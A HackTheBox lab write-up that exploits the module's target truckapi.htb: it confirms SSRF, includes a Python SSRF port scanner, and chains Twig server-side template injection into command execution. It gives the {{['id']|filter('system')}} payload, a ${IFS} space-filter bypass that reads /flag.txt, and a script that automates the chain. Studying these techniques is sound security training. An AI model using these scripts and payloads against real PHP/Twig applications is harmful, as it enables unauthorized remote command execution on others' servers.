Hackthebox - Server-Side Attack Module

Server-Side Attack

Application interface:

/images/htb-serverside-attack-0.png

After the page loads, the application automatically sends POST requests to retrieve data:

/images/htb-serverside-attack-1.png

At first glance, this request looks like an SSRF candidate. Testing confirmed the SSRF, but there is no outbound traffic (no callback ever reaches an attacker-controlled host), and a port scan through the SSRF shows only ports 80 and 3306 open on the internal side, so the SSRF alone does not give a useful foothold:

Port scan:

/images/htb-serverside-attack-2.png

File name scan:

/images/htb-serverside-attack-3.png
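The internal port scan above was done by hand in the screenshots; the script below is an added example (not the module's own tooling) of the same technique: push http://127.0.0.1:PORT/ through the SSRF sink and flag ports whose response differs from a known-closed baseline in status, size or latency. The POST parameter name (`api`) and the closed reference port are assumptions, as is the sample result table, which is constructed rather than captured.

```python
"""SSRF-assisted internal port scan (added example, not the module's own code).

Assumed (not stated on the page): the POST parameter carrying the fetched URL
is `api`, the sink is http://truckapi.htb/, and port 1 on localhost is closed
and therefore usable as the "closed" baseline.
"""
import time
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://truckapi.htb/"   # page's host; endpoint path assumed
PARAM = "api"                     # assumed POST parameter name
CLOSED_PORT = 1                   # assumed closed port, used as baseline


def fetch_via_ssrf(internal_url: str, timeout: float = 5.0) -> tuple[int, int, float]:
    """POST internal_url through the SSRF sink; return (status, body_len, seconds)."""
    data = urllib.parse.urlencode({PARAM: internal_url}).encode()
    req = urllib.request.Request(TARGET, data=data, method="POST")
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
            return resp.status, len(body), time.monotonic() - start
    except urllib.error.HTTPError as e:
        return e.code, len(e.read()), time.monotonic() - start
    except urllib.error.URLError:
        # Timeout / connection failure on the sink side: status 0 marks it.
        return 0, 0, time.monotonic() - start


def classify(results: dict[int, tuple[int, int, float]],
             baseline: tuple[int, int, float],
             len_tolerance: int = 20,
             time_factor: float = 3.0) -> list[int]:
    """Return ports whose response deviates from the closed-port baseline.

    A port is reported when the status differs, the body length moves by more
    than len_tolerance bytes (closed ports usually yield a fixed error page),
    or the request takes time_factor times longer (a listener that holds the
    socket open, e.g. MySQL waiting for a client handshake).
    """
    b_status, b_len, b_time = baseline
    open_ports = []
    for port, (status, length, elapsed) in sorted(results.items()):
        if (status != b_status
                or abs(length - b_len) > len_tolerance
                or elapsed > time_factor * max(b_time, 0.05)):
            open_ports.append(port)
    return open_ports


def scan(ports, host: str = "127.0.0.1") -> list[int]:
    """Live scan: baseline first, then every port in `ports` (network, not run in tests)."""
    baseline = fetch_via_ssrf(f"http://{host}:{CLOSED_PORT}/")
    results = {p: fetch_via_ssrf(f"http://{host}:{p}/") for p in ports}
    return classify(results, baseline)


# Constructed sample table (status, body length, seconds), not real captures.
SAMPLE_BASELINE = (200, 512, 0.04)
SAMPLE_RESULTS = {
    22:   (200, 512, 0.04),   # identical to baseline: closed
    80:   (200, 2048, 0.05),  # real HTML comes back: open
    443:  (200, 515, 0.04),   # tiny jitter only: closed
    3306: (200, 600, 0.06),   # MySQL greeting bytes echoed: open
    8080: (200, 512, 0.03),   # closed
}

if __name__ == "__main__":
    print(classify(SAMPLE_RESULTS, SAMPLE_BASELINE))
```

The length tolerance matters: many error pages embed the requested URL, so a closed port's body length drifts by the width of the port number, which is why a small difference is ignored.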

Note that the application reflects user-supplied input back into the page:

/images/htb-serverside-attack-4.png

/images/htb-serverside-attack-5.png

/images/htb-serverside-attack-6.png

Testing for server-side template injection (SSTI).

Since the application runs on PHP, I tried a Twig payload (Twig is the template engine used by the Symfony framework): {{7*'7'}}. If the response contains 49 instead of the literal expression, the input was evaluated as template code.

/images/htb-serverside-attack-7.png

The expression is evaluated, which confirms the application is vulnerable to SSTI.

Twig RCE payload: {{['id']|filter('system')}}

/images/htb-serverside-attack-8.png

However, the application rejects the space character, so a command that contains one produces an error:

Payload: http://truckapi.htb/?id=FusionExpress03{{['ls /']|filter('system')}}

/images/htb-serverside-attack-9.png

Since the application runs on Linux, this can be bypassed with ${IFS}. IFS is the shell's internal field separator, which defaults to space, tab and newline; system() hands the command to /bin/sh, and an unquoted ${IFS} expansion is split into separate words, so cat${IFS}/flag.txt becomes the two arguments cat and /flag.txt exactly as a space would. Blocking single characters is not a fix for SSTI: the id value has to be passed to a fixed template as data, never concatenated into the template source.

/images/htb-serverside-attack-10.png

Read the flag:

Payload: http://truckapi.htb/?id=FusionExpress03{{['cat${IFS}/flag.txt']|filter('system')}}

/images/htb-serverside-attack-11.png
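The whole chain above (probe, confirm, build the Twig system() payload, apply the ${IFS} space bypass) as one script. This is an added example, not the module's or the target's code. It reuses the parameter name `id`, the prefix FusionExpress03 and the host truckapi.htb from the payloads on this page; the response-check heuristic and the live `run` helper are assumptions.

```python
"""Twig SSTI probe and exploit builder (added example, not the module's own code).

Assumed from this page's payloads: injectable GET parameter `id`, expected
prefix FusionExpress03, target http://truckapi.htb/.
"""
import urllib.parse
import urllib.request

TARGET = "http://truckapi.htb/"
PREFIX = "FusionExpress03"

PROBE = "{{7*'7'}}"   # Twig coerces '7' to a number and evaluates this to 49
PROBE_EXPECT = "49"


def ssti_confirmed(body: str) -> bool:
    """Heuristic: the result appears and the raw probe does not, so it was evaluated, not echoed."""
    return PROBE_EXPECT in body and PROBE not in body


def twig_system(cmd: str) -> str:
    """Build {{['<cmd>']|filter('system')}}, with spaces replaced by ${IFS}.

    Twig's `filter` filter calls the named PHP function on each array element,
    so `system` runs cmd. The target rejects ' ', and /bin/sh word-splits the
    expanded IFS variable, so `cat /flag.txt` still arrives as two arguments.
    A single quote would close the Twig string literal, so it is refused.
    """
    if "'" in cmd:
        raise ValueError("single quote would terminate the Twig string literal")
    return "{{['" + cmd.replace(" ", "${IFS}") + "']|filter('system')}}"


def build_url(template: str) -> str:
    """Full request URL with the prefix and template in the id parameter (URL-encoded)."""
    return TARGET + "?" + urllib.parse.urlencode({"id": PREFIX + template})


def run(cmd: str) -> str:
    """Send the payload live and return the body (network; not exercised by tests)."""
    with urllib.request.urlopen(build_url(twig_system(cmd)), timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print(build_url(PROBE))                       # step 1: probe
    print(build_url(twig_system("id")))           # step 2: RCE without spaces
    print(build_url(twig_system("cat /flag.txt")))  # step 3: ${IFS} bypass
```

Because urlencode percent-encodes the braces, quotes and `$`, the URL the script sends decodes on the server to exactly the raw payload shown in the screenshots; typing the raw form into a browser gets the same treatment.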